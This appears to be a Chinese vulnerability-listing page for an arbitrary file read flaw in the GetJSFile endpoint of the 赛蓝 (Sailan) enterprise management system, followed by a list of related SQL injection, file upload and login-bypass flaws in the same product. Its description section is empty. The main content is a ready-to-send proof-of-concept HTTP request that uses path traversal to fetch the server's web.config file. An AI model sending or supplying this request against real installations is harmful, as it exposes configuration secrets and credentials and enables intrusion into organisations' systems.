赛蓝企业管理系统 GetJSFile 任意文件读取漏洞

漏洞描述

PoC代码

GET /Utility/GetJSFile?filePath=../web.config HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.5 Safari/605.1.15

相关漏洞推荐

• 赛蓝企业管理系统 GetImportDetailJson SQL注入漏洞
• 赛蓝企业管理系统 /BaseModule/ExcelImport/GetImportDetailJson SQL 注入漏洞
• 赛蓝企业管理系统 GetImportDetailJson SQL注入漏洞
• 赛蓝企业管理系统 GetImportDetailJson SQL注入
• 赛蓝企业管理系统 SubmitUploadify 文件上传漏洞
• 赛蓝企业管理系统GetCssFile任意文件读取漏洞
• 赛蓝企业管理系统 GetFieldJson SQL 注入漏洞
• 赛蓝企业管理系统 EHR_Holidays/SubmitUploadify 任意文件上传漏洞
• 赛蓝企业管理系统 GetCssFile 任意文件读取漏洞
• 赛蓝企业管理系统 GetCssFile存在任意文件读取漏洞
• POC 赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞
• 赛蓝企业管理系统EHR_Holidays_SubmitUploadify存在任意文件上传漏洞
• 赛蓝企业管理系统GetFieldJson存在SQL注入漏洞